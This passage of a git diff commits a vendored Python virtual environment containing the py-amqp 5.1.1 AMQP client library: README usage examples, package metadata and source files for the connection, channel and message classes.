import amqp + + with amqp.Connection('broker.example.com') as c: + ch = c.channel() + ch.basic_publish(amqp.Message('Hello World'), routing_key='test') + +Producer publishing to ``test_exchange`` exchange with publisher confirms enabled and using virtual_host ``test_vhost``: + +.. code:: python + + import amqp + + with amqp.Connection( + 'broker.example.com', exchange='test_exchange', + confirm_publish=True, virtual_host='test_vhost' + ) as c: + ch = c.channel() + ch.basic_publish(amqp.Message('Hello World'), routing_key='test') + +Consumer with acknowledgments enabled: + +.. code:: python + + import amqp + + with amqp.Connection('broker.example.com') as c: + ch = c.channel() + def on_message(message): + print('Received message (delivery tag: {}): {}'.format(message.delivery_tag, message.body)) + ch.basic_ack(message.delivery_tag) + ch.basic_consume(queue='test', callback=on_message) + while True: + c.drain_events() + + +Consumer with acknowledgments disabled: + +.. code:: python + + import amqp + + with amqp.Connection('broker.example.com') as c: + ch = c.channel() + def on_message(message): + print('Received message (delivery tag: {}): {}'.format(message.delivery_tag, message.body)) + ch.basic_consume(queue='test', callback=on_message, no_ack=True) + while True: + c.drain_events() + +Speedups +======== + +This library has **experimental** support of speedups. Speedups are implemented using Cython. To enable speedups, ``CELERY_ENABLE_SPEEDUPS`` environment variable must be set during building/installation. +Currently speedups can be installed: + +1. using source package (using ``--no-binary`` switch): + +.. code:: shell + + CELERY_ENABLE_SPEEDUPS=true pip install --no-binary :all: amqp + + +2. building directly source code: + +.. code:: shell + + CELERY_ENABLE_SPEEDUPS=true python setup.py install + +Further +======= + +- Differences between AMQP 0.8 and 0.9.1 + + http://www.rabbitmq.com/amqp-0-8-to-0-9-1.html + +- AMQP 0.9.1 Quick Reference + + http://www.rabbitmq.com/amqp-0-9-1-quickref.html + +- RabbitMQ Extensions + + http://www.rabbitmq.com/extensions.html + +- For more information about AMQP, visit + + http://www.amqp.org + +- For other Python client libraries see: + + http://www.rabbitmq.com/devtools.html#python-dev + +.. |build-status| image:: https://api.travis-ci.com/celery/py-amqp.png?branch=master + :alt: Build status + :target: https://travis-ci.com/celery/py-amqp + +.. |coverage| image:: https://codecov.io/github/celery/py-amqp/coverage.svg?branch=master + :target: https://codecov.io/github/celery/py-amqp?branch=master + +.. |license| image:: https://img.shields.io/pypi/l/amqp.svg + :alt: BSD License + :target: https://opensource.org/licenses/BSD-3-Clause + +.. |wheel| image:: https://img.shields.io/pypi/wheel/amqp.svg + :alt: Python AMQP can be installed via wheel + :target: https://pypi.org/project/amqp/ + +.. |pyversion| image:: https://img.shields.io/pypi/pyversions/amqp.svg + :alt: Supported Python versions. + :target: https://pypi.org/project/amqp/ + +.. |pyimp| image:: https://img.shields.io/pypi/implementation/amqp.svg + :alt: Support Python implementations. + :target: https://pypi.org/project/amqp/ + +py-amqp as part of the Tidelift Subscription +============================================ + +The maintainers of py-amqp and thousands of other packages are working with Tidelift to deliver commercial support and maintenance for the open source dependencies you use to build your applications. Save time, reduce risk, and improve code health, while paying the maintainers of the exact dependencies you use. [Learn more.](https://tidelift.com/subscription/pkg/pypi-amqp?utm_source=pypi-amqp&utm_medium=referral&utm_campaign=readme&utm_term=repo) + + + diff --git a/env/Lib/site-packages/amqp-5.1.1.dist-info/RECORD b/env/Lib/site-packages/amqp-5.1.1.dist-info/RECORD new file mode 100644 index 00000000..5b60e942 --- /dev/null +++ b/env/Lib/site-packages/amqp-5.1.1.dist-info/RECORD @@ -0,0 +1,34 @@ +amqp-5.1.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +amqp-5.1.1.dist-info/LICENSE,sha256=9e9fEoLq4ZMcdGRfhxm2xps9aizyd7_aJJqCcM1HOvM,2372 +amqp-5.1.1.dist-info/METADATA,sha256=U0V_hIpM3GJaDCdXXI_LGo1jZJFydz6_b29E2aohLmc,8867 +amqp-5.1.1.dist-info/RECORD,, +amqp-5.1.1.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92 +amqp-5.1.1.dist-info/top_level.txt,sha256=tWQNmFVhU4UtDgB6Yy2lKqRz7LtOrRcN8_bPFVcVVR8,5 +amqp/__init__.py,sha256=-o4VeUXiY-qfYQNUKLRc2ry9pYi6a4HEjMTwXsX_ios,2365 +amqp/__pycache__/__init__.cpython-310.pyc,, +amqp/__pycache__/abstract_channel.cpython-310.pyc,, +amqp/__pycache__/basic_message.cpython-310.pyc,, +amqp/__pycache__/channel.cpython-310.pyc,, +amqp/__pycache__/connection.cpython-310.pyc,, +amqp/__pycache__/exceptions.cpython-310.pyc,, +amqp/__pycache__/method_framing.cpython-310.pyc,, +amqp/__pycache__/platform.cpython-310.pyc,, +amqp/__pycache__/protocol.cpython-310.pyc,, +amqp/__pycache__/sasl.cpython-310.pyc,, +amqp/__pycache__/serialization.cpython-310.pyc,, +amqp/__pycache__/spec.cpython-310.pyc,, +amqp/__pycache__/transport.cpython-310.pyc,, +amqp/__pycache__/utils.cpython-310.pyc,, +amqp/abstract_channel.py,sha256=D_OEWvX48yKUzMYm_sN-IDRQmqIGvegi9KlJriqttBc,4941 +amqp/basic_message.py,sha256=Q8DV31tuuphloTETPHiJFwNg6b5M6pccJ0InJ4MZUz8,3357 +amqp/channel.py,sha256=XzCuKPy9qFMiTsnqksKpFIh9PUcKZm3uIXm1RFCeZQs,74475 +amqp/connection.py,sha256=e_FbJYzI1_ekUbWzlQ6kIHOn8sM2Npen10WH3TFv0A8,27347 +amqp/exceptions.py,sha256=yqjoFIRue2rvK7kMdvkKsGOD6dMOzzzT3ZzBwoGWAe4,7166 +amqp/method_framing.py,sha256=avnw90X9t4995HpHoZV4-1V73UEbzUKJ83pHEicAqWY,6734 +amqp/platform.py,sha256=cyLevv6E15P9zhMo_fV84p67Q_A8fdsTq9amjvlUwqE,2379 +amqp/protocol.py,sha256=Di3y6qqhnOV4QtkeYKO-zryfWqwl3F1zUxDOmVSsAp0,291 +amqp/sasl.py,sha256=6AbsnxlbAyoiYxDezoQTfm-E0t_TJyHXpqGJ0KlPkI4,5986 +amqp/serialization.py,sha256=xzzXmmQ45fGUuSCxGTEMizmRQTmzaz3Z7YYfpxmfXuY,17162 +amqp/spec.py,sha256=2ZjbL4FR4Fv67HA7HUI9hLUIvAv3A4ZH6GRPzrMRyWg,2121 +amqp/transport.py,sha256=MyiYBerBqAMFCM-fyZgPXiCha3dz-2S6Z9cGO8IZyTg,22826 +amqp/utils.py,sha256=JjjY040LwsDUc1zmKP2VTzXBioVXy48DUZtWB8PaPy0,1456 diff --git a/env/Lib/site-packages/amqp-5.1.1.dist-info/WHEEL b/env/Lib/site-packages/amqp-5.1.1.dist-info/WHEEL new file mode 100644 index 00000000..becc9a66 --- /dev/null +++ b/env/Lib/site-packages/amqp-5.1.1.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/env/Lib/site-packages/amqp-5.1.1.dist-info/top_level.txt b/env/Lib/site-packages/amqp-5.1.1.dist-info/top_level.txt new file mode 100644 index 00000000..5e610d34 --- /dev/null +++ b/env/Lib/site-packages/amqp-5.1.1.dist-info/top_level.txt @@ -0,0 +1 @@ +amqp diff --git a/env/Lib/site-packages/amqp/__init__.py b/env/Lib/site-packages/amqp/__init__.py new file mode 100644 index 00000000..1899b52e --- /dev/null +++ b/env/Lib/site-packages/amqp/__init__.py @@ -0,0 +1,75 @@ +"""Low-level AMQP client for Python (fork of amqplib).""" +# Copyright (C) 2007-2008 Barry Pederson + +import re +from collections import namedtuple + +__version__ = '5.1.1' +__author__ = 'Barry Pederson' +__maintainer__ = 'Asif Saif Uddin, Matus Valo' +__contact__ = 'pyamqp@celeryproject.org' +__homepage__ = 'http://github.com/celery/py-amqp' +__docformat__ = 'restructuredtext' + +# -eof meta- + +version_info_t = namedtuple('version_info_t', ( + 'major', 'minor', 'micro', 'releaselevel', 'serial', +)) + +# bumpversion can only search for {current_version} +# so we have to parse the version here. +_temp = re.match( + r'(\d+)\.(\d+).(\d+)(.+)?', __version__).groups() +VERSION = version_info = version_info_t( + int(_temp[0]), int(_temp[1]), int(_temp[2]), _temp[3] or '', '') +del(_temp) +del(re) + +from .basic_message import Message # noqa +from .channel import Channel # noqa +from .connection import Connection # noqa +from .exceptions import (AccessRefused, AMQPError, # noqa + AMQPNotImplementedError, ChannelError, ChannelNotOpen, + ConnectionError, ConnectionForced, ConsumerCancelled, + ContentTooLarge, FrameError, FrameSyntaxError, + InternalError, InvalidCommand, InvalidPath, + IrrecoverableChannelError, + IrrecoverableConnectionError, NoConsumers, NotAllowed, + NotFound, PreconditionFailed, RecoverableChannelError, + RecoverableConnectionError, ResourceError, + ResourceLocked, UnexpectedFrame, error_for_code) +from .utils import promise # noqa + +__all__ = ( + 'Connection', + 'Channel', + 'Message', + 'promise', + 'AMQPError', + 'ConnectionError', + 'RecoverableConnectionError', + 'IrrecoverableConnectionError', + 'ChannelError', + 'RecoverableChannelError', + 'IrrecoverableChannelError', + 'ConsumerCancelled', + 'ContentTooLarge', + 'NoConsumers', + 'ConnectionForced', + 'InvalidPath', + 'AccessRefused', + 'NotFound', + 'ResourceLocked', + 'PreconditionFailed', + 'FrameError', + 'FrameSyntaxError', + 'InvalidCommand', + 'ChannelNotOpen', + 'UnexpectedFrame', + 'ResourceError', + 'NotAllowed', + 'AMQPNotImplementedError', + 'InternalError', + 'error_for_code', +) diff --git a/env/Lib/site-packages/amqp/abstract_channel.py b/env/Lib/site-packages/amqp/abstract_channel.py new file mode 100644 index 00000000..ae95a89e --- /dev/null +++ b/env/Lib/site-packages/amqp/abstract_channel.py @@ -0,0 +1,163 @@ +"""Code common to Connection and Channel objects.""" +# Copyright (C) 2007-2008 Barry Pederson ) + +import logging + +from vine import ensure_promise, promise + +from .exceptions import AMQPNotImplementedError, RecoverableConnectionError +from .serialization import dumps, loads + +__all__ = ('AbstractChannel',) + +AMQP_LOGGER = logging.getLogger('amqp') + +IGNORED_METHOD_DURING_CHANNEL_CLOSE = """\ +Received method %s during closing channel %s. This method will be ignored\ +""" + + +class AbstractChannel: + """Superclass for Connection and Channel. + + The connection is treated as channel 0, then comes + user-created channel objects. + + The subclasses must have a _METHOD_MAP class property, mapping + between AMQP method signatures and Python methods. + """ + + def __init__(self, connection, channel_id): + self.is_closing = False + self.connection = connection + self.channel_id = channel_id + connection.channels[channel_id] = self + self.method_queue = [] # Higher level queue for methods + self.auto_decode = False + self._pending = {} + self._callbacks = {} + + self._setup_listeners() + + __slots__ = ( + "is_closing", + "connection", + "channel_id", + "method_queue", + "auto_decode", + "_pending", + "_callbacks", + # adding '__dict__' to get dynamic assignment + "__dict__", + "__weakref__", + ) + + def __enter__(self): + return self + + def __exit__(self, *exc_info): + self.close() + + def send_method(self, sig, + format=None, args=None, content=None, + wait=None, callback=None, returns_tuple=False): + p = promise() + conn = self.connection + if conn is None: + raise RecoverableConnectionError('connection already closed') + args = dumps(format, args) if format else '' + try: + conn.frame_writer(1, self.channel_id, sig, args, content) + except StopIteration: + raise RecoverableConnectionError('connection already closed') + + # TODO temp: callback should be after write_method ... ;) + if callback: + p.then(callback) + p() + if wait: + return self.wait(wait, returns_tuple=returns_tuple) + return p + + def close(self): + """Close this Channel or Connection.""" + raise NotImplementedError('Must be overridden in subclass') + + def wait(self, method, callback=None, timeout=None, returns_tuple=False): + p = ensure_promise(callback) + pending = self._pending + prev_p = [] + if not isinstance(method, list): + method = [method] + + for m in method: + prev_p.append(pending.get(m)) + pending[m] = p + + try: + while not p.ready: + self.connection.drain_events(timeout=timeout) + + if p.value: + args, kwargs = p.value + args = args[1:] # We are not returning method back + return args if returns_tuple else (args and args[0]) + finally: + for i, m in enumerate(method): + if prev_p[i] is not None: + pending[m] = prev_p[i] + else: + pending.pop(m, None) + + def dispatch_method(self, method_sig, payload, content): + if self.is_closing and method_sig not in ( + self._ALLOWED_METHODS_WHEN_CLOSING + ): + # When channel.close() was called we must ignore all methods except + # Channel.close and Channel.CloseOk + AMQP_LOGGER.warning( + IGNORED_METHOD_DURING_CHANNEL_CLOSE, + method_sig, self.channel_id + ) + return + + if content and \ + self.auto_decode and \ + hasattr(content, 'content_encoding'): + try: + content.body = content.body.decode(content.content_encoding) + except Exception: + pass + + try: + amqp_method = self._METHODS[method_sig] + except KeyError: + raise AMQPNotImplementedError( + f'Unknown AMQP method {method_sig!r}') + + try: + listeners = [self._callbacks[method_sig]] + except KeyError: + listeners = [] + one_shot = None + try: + one_shot = self._pending.pop(method_sig) + except KeyError: + if not listeners: + return + + args = [] + if amqp_method.args: + args, _ = loads(amqp_method.args, payload, 4) + if amqp_method.content: + args.append(content) + + for listener in listeners: + listener(*args) + + if one_shot: + one_shot(method_sig, *args) + + #: Placeholder, the concrete implementations will have to + #: supply their own versions of _METHOD_MAP + _METHODS = {} diff --git a/env/Lib/site-packages/amqp/basic_message.py b/env/Lib/site-packages/amqp/basic_message.py new file mode 100644 index 00000000..cee0515d --- /dev/null +++ b/env/Lib/site-packages/amqp/basic_message.py @@ -0,0 +1,122 @@ +"""AMQP Messages.""" +# Copyright (C) 2007-2008 Barry Pederson +from .serialization import GenericContent +# Intended to fix #85: ImportError: cannot import name spec +# Encountered on python 2.7.3 +# "The submodules often need to refer to each other. For example, the +# surround [sic] module might use the echo module. In fact, such +# references are so common that the import statement first looks in +# the containing package before looking in the standard module search +# path." +# Source: +# http://stackoverflow.com/a/14216937/4982251 +from .spec import Basic + +__all__ = ('Message',) + + +class Message(GenericContent): + """A Message for use with the Channel.basic_* methods. + + Expected arg types + + body: string + children: (not supported) + + Keyword properties may include: + + content_type: shortstr + MIME content type + + content_encoding: shortstr + MIME content encoding + + application_headers: table + Message header field table, a dict with string keys, + and string | int | Decimal | datetime | dict values. + + delivery_mode: octet + Non-persistent (1) or persistent (2) + + priority: octet + The message priority, 0 to 9 + + correlation_id: shortstr + The application correlation identifier + + reply_to: shortstr + The destination to reply to + + expiration: shortstr + Message expiration specification + + message_id: shortstr + The application message identifier + + timestamp: unsigned long + The message timestamp + + type: shortstr + The message type name + + user_id: shortstr + The creating user id + + app_id: shortstr + The creating application id + + cluster_id: shortstr + Intra-cluster routing identifier + + Unicode bodies are encoded according to the 'content_encoding' + argument. If that's None, it's set to 'UTF-8' automatically. + + Example:: + + msg = Message('hello world', + content_type='text/plain', + application_headers={'foo': 7}) + """ + + CLASS_ID = Basic.CLASS_ID + + #: Instances of this class have these attributes, which + #: are passed back and forth as message properties between + #: client and server + PROPERTIES = [ + ('content_type', 's'), + ('content_encoding', 's'), + ('application_headers', 'F'), + ('delivery_mode', 'o'), + ('priority', 'o'), + ('correlation_id', 's'), + ('reply_to', 's'), + ('expiration', 's'), + ('message_id', 's'), + ('timestamp', 'L'), + ('type', 's'), + ('user_id', 's'), + ('app_id', 's'), + ('cluster_id', 's') + ] + + def __init__(self, body='', children=None, channel=None, **properties): + super().__init__(**properties) + #: set by basic_consume/basic_get + self.delivery_info = None + self.body = body + self.channel = channel + + __slots__ = ( + "delivery_info", + "body", + "channel", + ) + + @property + def headers(self): + return self.properties.get('application_headers') + + @property + def delivery_tag(self): + return self.delivery_info.get('delivery_tag') diff --git a/env/Lib/site-packages/amqp/channel.py b/env/Lib/site-packages/amqp/channel.py new file mode 100644 index 00000000..fffc7b8e --- /dev/null +++ b/env/Lib/site-packages/amqp/channel.py @@ -0,0 +1,2127 @@ +"""AMQP Channels.""" +# Copyright (C) 2007-2008 Barry Pederson + +import logging +import socket +from collections import defaultdict +from queue import Queue + +from vine import ensure_promise + +from . import spec +from .abstract_channel import AbstractChannel +from .exceptions import (ChannelError, ConsumerCancelled, MessageNacked, + RecoverableChannelError, RecoverableConnectionError, + error_for_code) +from .protocol import queue_declare_ok_t + +__all__ = ('Channel',) + +AMQP_LOGGER = logging.getLogger('amqp') + +REJECTED_MESSAGE_WITHOUT_CALLBACK = """\ +Rejecting message with delivery tag %r for reason of having no callbacks. +consumer_tag=%r exchange=%r routing_key=%r.\ +""" + + +class VDeprecationWarning(DeprecationWarning): + pass + + +class Channel(AbstractChannel): + """AMQP Channel. + + The channel class provides methods for a client to establish a + virtual connection - a channel - to a server and for both peers to + operate the virtual connection thereafter. + + GRAMMAR:: + + channel = open-channel *use-channel close-channel + open-channel = C:OPEN S:OPEN-OK + use-channel = C:FLOW S:FLOW-OK + / S:FLOW C:FLOW-OK + / functional-class + close-channel = C:CLOSE S:CLOSE-OK + / S:CLOSE C:CLOSE-OK + + Create a channel bound to a connection and using the specified + numeric channel_id, and open on the server. + + The 'auto_decode' parameter (defaults to True), indicates + whether the library should attempt to decode the body + of Messages to a Unicode string if there's a 'content_encoding' + property for the message. If there's no 'content_encoding' + property, or the decode raises an Exception, the message body + is left as plain bytes. + """ + + _METHODS = { + spec.method(spec.Channel.Close, 'BsBB'), + spec.method(spec.Channel.CloseOk), + spec.method(spec.Channel.Flow, 'b'), + spec.method(spec.Channel.FlowOk, 'b'), + spec.method(spec.Channel.OpenOk), + spec.method(spec.Exchange.DeclareOk), + spec.method(spec.Exchange.DeleteOk), + spec.method(spec.Exchange.BindOk), + spec.method(spec.Exchange.UnbindOk), + spec.method(spec.Queue.BindOk), + spec.method(spec.Queue.UnbindOk), + spec.method(spec.Queue.DeclareOk, 'sll'), + spec.method(spec.Queue.DeleteOk, 'l'), + spec.method(spec.Queue.PurgeOk, 'l'), + spec.method(spec.Basic.Cancel, 's'), + spec.method(spec.Basic.CancelOk, 's'), + spec.method(spec.Basic.ConsumeOk, 's'), + spec.method(spec.Basic.Deliver, 'sLbss', content=True), + spec.method(spec.Basic.GetEmpty, 's'), + spec.method(spec.Basic.GetOk, 'Lbssl', content=True), + spec.method(spec.Basic.QosOk), + spec.method(spec.Basic.RecoverOk), + spec.method(spec.Basic.Return, 'Bsss', content=True), + spec.method(spec.Tx.CommitOk), + spec.method(spec.Tx.RollbackOk), + spec.method(spec.Tx.SelectOk), + spec.method(spec.Confirm.SelectOk), + spec.method(spec.Basic.Ack, 'Lb'), + spec.method(spec.Basic.Nack, 'Lb'), + } + _METHODS = {m.method_sig: m for m in _METHODS} + + _ALLOWED_METHODS_WHEN_CLOSING = ( + spec.Channel.Close, spec.Channel.CloseOk + ) + + def __init__(self, connection, + channel_id=None, auto_decode=True, on_open=None): + if channel_id: + connection._claim_channel_id(channel_id) + else: + channel_id = connection._get_free_channel_id() + + AMQP_LOGGER.debug('using channel_id: %s', channel_id) + + super().__init__(connection, channel_id) + + self.is_open = False + self.active = True # Flow control + self.returned_messages = Queue() + self.callbacks = {} + self.cancel_callbacks = {} + self.auto_decode = auto_decode + self.events = defaultdict(set) + self.no_ack_consumers = set() + + self.on_open = ensure_promise(on_open) + + # set first time basic_publish_confirm is called + # and publisher confirms are enabled for this channel. + self._confirm_selected = False + if self.connection.confirm_publish: + self.basic_publish = self.basic_publish_confirm + + __slots__ = ( + "is_open", + "active", + "returned_messages", + "callbacks", + "cancel_callbacks", + "events", + "no_ack_consumers", + "on_open", + "_confirm_selected", + ) + + def then(self, on_success, on_error=None): + return self.on_open.then(on_success, on_error) + + def _setup_listeners(self): + self._callbacks.update({ + spec.Channel.Close: self._on_close, + spec.Channel.CloseOk: self._on_close_ok, + spec.Channel.Flow: self._on_flow, + spec.Channel.OpenOk: self._on_open_ok, + spec.Basic.Cancel: self._on_basic_cancel, + spec.Basic.CancelOk: self._on_basic_cancel_ok, + spec.Basic.Deliver: self._on_basic_deliver, + spec.Basic.Return: self._on_basic_return, + spec.Basic.Ack: self._on_basic_ack, + spec.Basic.Nack: self._on_basic_nack, + }) + + def collect(self): + """Tear down this object. + + Best called after we've agreed to close with the server. + """ + AMQP_LOGGER.debug('Closed channel #%s', self.channel_id) + self.is_open = False + channel_id, self.channel_id = self.channel_id, None + connection, self.connection = self.connection, None + if connection: + connection.channels.pop(channel_id, None) + try: + connection._used_channel_ids.remove(channel_id) + except ValueError: + # channel id already removed + pass + self.callbacks.clear() + self.cancel_callbacks.clear() + self.events.clear() + self.no_ack_consumers.clear() + + def _do_revive(self): + self.is_open = False + self.open() + + def close(self, reply_code=0, reply_text='', method_sig=(0, 0), + argsig='BsBB'): + """Request a channel close. + + This method indicates that the sender wants to close the + channel. This may be due to internal conditions (e.g. a forced + shut-down) or due to an error handling a specific method, i.e. + an exception. When a close is due to an exception, the sender + provides the class and method id of the method which caused + the exception. + + RULE: + + After sending this method any received method except + Channel.Close-OK MUST be discarded. + + RULE: + + The peer sending this method MAY use a counter or timeout + to detect failure of the other peer to respond correctly + with Channel.Close-OK.. + + PARAMETERS: + reply_code: short + + The reply code. The AMQ reply codes are defined in AMQ + RFC 011. + + reply_text: shortstr + + The localised reply text. This text can be logged as an + aid to resolving issues. + + class_id: short + + failing method class + + When the close is provoked by a method exception, this + is the class of the method. + + method_id: short + + failing method ID + + When the close is provoked by a method exception, this + is the ID of the method. + """ + try: + if self.connection is None: + return + if self.connection.channels is None: + return + if not self.is_open: + return + + self.is_closing = True + return self.send_method( + spec.Channel.Close, argsig, + (reply_code, reply_text, method_sig[0], method_sig[1]), + wait=spec.Channel.CloseOk, + ) + finally: + self.is_closing = False + self.connection = None + + def _on_close(self, reply_code, reply_text, class_id, method_id): + """Request a channel close. + + This method indicates that the sender wants to close the + channel. This may be due to internal conditions (e.g. a forced + shut-down) or due to an error handling a specific method, i.e. + an exception. When a close is due to an exception, the sender + provides the class and method id of the method which caused + the exception. + + RULE: + + After sending this method any received method except + Channel.Close-OK MUST be discarded. + + RULE: + + The peer sending this method MAY use a counter or timeout + to detect failure of the other peer to respond correctly + with Channel.Close-OK.. + + PARAMETERS: + reply_code: short + + The reply code. The AMQ reply codes are defined in AMQ + RFC 011. + + reply_text: shortstr + + The localised reply text. This text can be logged as an + aid to resolving issues. + + class_id: short + + failing method class + + When the close is provoked by a method exception, this + is the class of the method. + + method_id: short + + failing method ID + + When the close is provoked by a method exception, this + is the ID of the method. + """ + self.send_method(spec.Channel.CloseOk) + if not self.connection.is_closing: + self._do_revive() + raise error_for_code( + reply_code, reply_text, (class_id, method_id), ChannelError, + ) + + def _on_close_ok(self): + """Confirm a channel close. + + This method confirms a Channel.Close method and tells the + recipient that it is safe to release resources for the channel + and close the socket. + + RULE: + + A peer that detects a socket closure without having + received a Channel.Close-Ok handshake method SHOULD log + the error. + """ + self.collect() + + def flow(self, active): + """Enable/disable flow from peer. + + This method asks the peer to pause or restart the flow of + content data. This is a simple flow-control mechanism that a + peer can use to avoid overflowing its queues or otherwise + finding itself receiving more messages than it can process. + Note that this method is not intended for window control. The + peer that receives a request to stop sending content should + finish sending the current content, if any, and then wait + until it receives a Flow restart method. + + RULE: + + When a new channel is opened, it is active. Some + applications assume that channels are inactive until + started. To emulate this behaviour a client MAY open the + channel, then pause it. + + RULE: + + When sending content data in multiple frames, a peer + SHOULD monitor the channel for incoming methods and + respond to a Channel.Flow as rapidly as possible. + + RULE: + + A peer MAY use the Channel.Flow method to throttle + incoming content data for internal reasons, for example, + when exchanging data over a slower connection. + + RULE: + + The peer that requests a Channel.Flow method MAY + disconnect and/or ban a peer that does not respect the + request. + + PARAMETERS: + active: boolean + + start/stop content frames + + If True, the peer starts sending content frames. If + False, the peer stops sending content frames. + """ + return self.send_method( + spec.Channel.Flow, 'b', (active,), wait=spec.Channel.FlowOk, + ) + + def _on_flow(self, active): + """Enable/disable flow from peer. + + This method asks the peer to pause or restart the flow of + content data. This is a simple flow-control mechanism that a + peer can use to avoid overflowing its queues or otherwise + finding itself receiving more messages than it can process. + Note that this method is not intended for window control. The + peer that receives a request to stop sending content should + finish sending the current content, if any, and then wait + until it receives a Flow restart method. + + RULE: + + When a new channel is opened, it is active. Some + applications assume that channels are inactive until + started. To emulate this behaviour a client MAY open the + channel, then pause it. + + RULE: + + When sending content data in multiple frames, a peer + SHOULD monitor the channel for incoming methods and + respond to a Channel.Flow as rapidly as possible. + + RULE: + + A peer MAY use the Channel.Flow method to throttle + incoming content data for internal reasons, for example, + when exchanging data over a slower connection. + + RULE: + + The peer that requests a Channel.Flow method MAY + disconnect and/or ban a peer that does not respect the + request. + + PARAMETERS: + active: boolean + + start/stop content frames + + If True, the peer starts sending content frames. If + False, the peer stops sending content frames. + """ + self.active = active + self._x_flow_ok(self.active) + + def _x_flow_ok(self, active): + """Confirm a flow method. + + Confirms to the peer that a flow command was received and + processed. + + PARAMETERS: + active: boolean + + current flow setting + + Confirms the setting of the processed flow method: + True means the peer will start sending or continue + to send content frames; False means it will not. + """ + return self.send_method(spec.Channel.FlowOk, 'b', (active,)) + + def open(self): + """Open a channel for use. + + This method opens a virtual connection (a channel). + + RULE: + + This method MUST NOT be called when the channel is already + open. + + PARAMETERS: + out_of_band: shortstr (DEPRECATED) + + out-of-band settings + + Configures out-of-band transfers on this channel. The + syntax and meaning of this field will be formally + defined at a later date. + """ + if self.is_open: + return + + return self.send_method( + spec.Channel.Open, 's', ('',), wait=spec.Channel.OpenOk, + ) + + def _on_open_ok(self): + """Signal that the channel is ready. + + This method signals to the client that the channel is ready + for use. + """ + self.is_open = True + self.on_open(self) + AMQP_LOGGER.debug('Channel open') + + ############# + # + # Exchange + # + # + # work with exchanges + # + # Exchanges match and distribute messages across queues. + # Exchanges can be configured in the server or created at runtime. + # + # GRAMMAR:: + # + # exchange = C:DECLARE S:DECLARE-OK + # / C:DELETE S:DELETE-OK + # + # RULE: + # + # The server MUST implement the direct and fanout exchange + # types, and predeclare the corresponding exchanges named + # amq.direct and amq.fanout in each virtual host. The server + # MUST also predeclare a direct exchange to act as the default + # exchange for content Publish methods and for default queue + # bindings. + # + # RULE: + # + # The server SHOULD implement the topic exchange type, and + # predeclare the corresponding exchange named amq.topic in + # each virtual host. + # + # RULE: + # + # The server MAY implement the system exchange type, and + # predeclare the corresponding exchanges named amq.system in + # each virtual host. If the client attempts to bind a queue to + # the system exchange, the server MUST raise a connection + # exception with reply code 507 (not allowed). + # + + def exchange_declare(self, exchange, type, passive=False, durable=False, + auto_delete=True, nowait=False, arguments=None, + argsig='BssbbbbbF'): + """Declare exchange, create if needed. + + This method creates an exchange if it does not already exist, + and if the exchange exists, verifies that it is of the correct + and expected class. + + RULE: + + The server SHOULD support a minimum of 16 exchanges per + virtual host and ideally, impose no limit except as + defined by available resources. + + PARAMETERS: + exchange: shortstr + + RULE: + + Exchange names starting with "amq." are reserved + for predeclared and standardised exchanges. If + the client attempts to create an exchange starting + with "amq.", the server MUST raise a channel + exception with reply code 403 (access refused). + + type: shortstr + + exchange type + + Each exchange belongs to one of a set of exchange + types implemented by the server. The exchange types + define the functionality of the exchange - i.e. how + messages are routed through it. It is not valid or + meaningful to attempt to change the type of an + existing exchange. + + RULE: + + If the exchange already exists with a different + type, the server MUST raise a connection exception + with a reply code 507 (not allowed). + + RULE: + + If the server does not support the requested + exchange type it MUST raise a connection exception + with a reply code 503 (command invalid). + + passive: boolean + + do not create exchange + + If set, the server will not create the exchange. The + client can use this to check whether an exchange + exists without modifying the server state. + + RULE: + + If set, and the exchange does not already exist, + the server MUST raise a channel exception with + reply code 404 (not found). + + durable: boolean + + request a durable exchange + + If set when creating a new exchange, the exchange will + be marked as durable. Durable exchanges remain active + when a server restarts. Non-durable exchanges + (transient exchanges) are purged if/when a server + restarts. + + RULE: + + The server MUST support both durable and transient + exchanges. + + RULE: + + The server MUST ignore the durable field if the + exchange already exists. + + auto_delete: boolean + + auto-delete when unused + + If set, the exchange is deleted when all queues have + finished using it. + + RULE: + + The server SHOULD allow for a reasonable delay + between the point when it determines that an + exchange is not being used (or no longer used), + and the point when it deletes the exchange. At + the least it must allow a client to create an + exchange and then bind a queue to it, with a small + but non-zero delay between these two actions. + + RULE: + + The server MUST ignore the auto-delete field if + the exchange already exists. + + nowait: boolean + + do not send a reply method + + If set, the server will not respond to the method. The + client should not wait for a reply method. If the + server could not complete the method it will raise a + channel or connection exception. + + arguments: table + + arguments for declaration + + A set of arguments for the declaration. The syntax and + semantics of these arguments depends on the server + implementation. This field is ignored if passive is + True. + """ + self.send_method( + spec.Exchange.Declare, argsig, + (0, exchange, type, passive, durable, auto_delete, + False, nowait, arguments), + wait=None if nowait else spec.Exchange.DeclareOk, + ) + + def exchange_delete(self, exchange, if_unused=False, nowait=False, + argsig='Bsbb'): + """Delete an exchange. + + This method deletes an exchange. When an exchange is deleted + all queue bindings on the exchange are cancelled. + + PARAMETERS: + exchange: shortstr + + RULE: + + The exchange MUST exist. Attempting to delete a + non-existing exchange causes a channel exception. + + if_unused: boolean + + delete only if unused + + If set, the server will only delete the exchange if it + has no queue bindings. If the exchange has queue + bindings the server does not delete it but raises a + channel exception instead. + + RULE: + + If set, the server SHOULD delete the exchange but + only if it has no queue bindings. + + RULE: + + If set, the server SHOULD raise a channel + exception if the exchange is in use. + + nowait: boolean + + do not send a reply method + + If set, the server will not respond to the method. The + client should not wait for a reply method. If the + server could not complete the method it will raise a + channel or connection exception. + """ + return self.send_method( + spec.Exchange.Delete, argsig, (0, exchange, if_unused, nowait), + wait=None if nowait else spec.Exchange.DeleteOk, + ) + + def exchange_bind(self, destination, source='', routing_key='', + nowait=False, arguments=None, argsig='BsssbF'): + """Bind an exchange to an exchange. + + RULE: + + A server MUST allow and ignore duplicate bindings - that + is, two or more bind methods for a specific exchanges, + with identical arguments - without treating these as an + error. + + RULE: + + A server MUST allow cycles of exchange bindings to be + created including allowing an exchange to be bound to + itself. + + RULE: + + A server MUST not deliver the same message more than once + to a destination exchange, even if the topology of + exchanges and bindings results in multiple (even infinite) + routes to that exchange. + + PARAMETERS: + reserved-1: short + + destination: shortstr + + Specifies the name of the destination exchange to + bind. + + RULE: + + A client MUST NOT be allowed to bind a non- + existent destination exchange. + + RULE: + + The 